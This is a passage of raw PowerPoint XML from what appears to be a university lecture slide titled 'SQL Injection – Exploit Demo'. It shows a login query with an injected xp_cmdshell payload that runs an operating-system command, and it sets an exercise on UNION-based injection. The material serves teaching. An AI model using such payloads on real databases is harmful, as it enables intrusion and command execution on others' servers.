              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>8  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ExecuteQuery</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strQuery</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db_connection</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> );</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Straight Connector 8"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="178952" y="1562100"/>
              <a:ext cx="1905000" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFCC99"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="none" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="147295" y="3861048"/>
            <a:ext cx="7924800" cy="2522538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="365125" indent="-255588" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="BF6103"/>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BF6103"/>
              </a:buClr>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buChar char="▫"/>
              <a:defRPr sz="2000" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="BF610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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'; EXEC master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xp_cmdshell</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dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>' --</a:t>
            </a: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spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM username WHERE user = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> EXEC master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>' --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>' AND password = ''</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1736346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s and Settings\Admin\Рабочий стол\СПбГУТ.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6572264" y="857232"/>
            <a:ext cx="1714486" cy="325579"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 3" descr="D:\Documents and Settings\Admin\Рабочий стол\с1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8645382" y="857233"/>
            <a:ext cx="87456" cy="406106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 4" descr="D:\Documents and Settings\Admin\Рабочий стол\С2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8810625" y="714358"/>
            <a:ext cx="114299" cy="523870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 5" descr="D:\Documents and Settings\Admin\Рабочий стол\С3.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9027102" y="571483"/>
            <a:ext cx="116897" cy="701384"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3490" y="388775"/>
            <a:ext cx="7162800" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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Verdana" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Verdana"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2800" dirty="0" smtClean="0"/>
              <a:t>SQL Injection – Exploit Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323528" y="1020021"/>
            <a:ext cx="5191125" cy="1409700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="3382221"/>
            <a:ext cx="5549340" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What just happened</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make an example for UNION BASED SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="282993" y="2772622"/>
            <a:ext cx="6112724" cy="604838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2434513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 ДОД ИКСС 11.04.02">
  <a:themeElements>
    <a:clrScheme name="Другая 1">
      <a:dk1>
        <a:srgbClr val="2C2C2C"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="585858"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="EDEDED"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="A6A6A6"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FB8209"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="BF6103"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="C4652D"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="8B5D3D"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="5C92B5"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="67AFBD"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="C2A874"/>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ДОД ИКСС 11.04.02</Template>
  <TotalTime>982</TotalTime>
  <Words>4245</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Экран (4:3)</PresentationFormat>
  <Paragraphs>564</Paragraphs>
  <Slides>44</Slides>
  <Notes>44</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Презентация ДОД ИКСС 11.04.02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Пользователь Windows</cp:lastModifiedBy>
  <cp:revision>114</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-04-11T09:12:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-13T19:02:20Z</dcterms:modified>
</cp:coreProperties>
</file>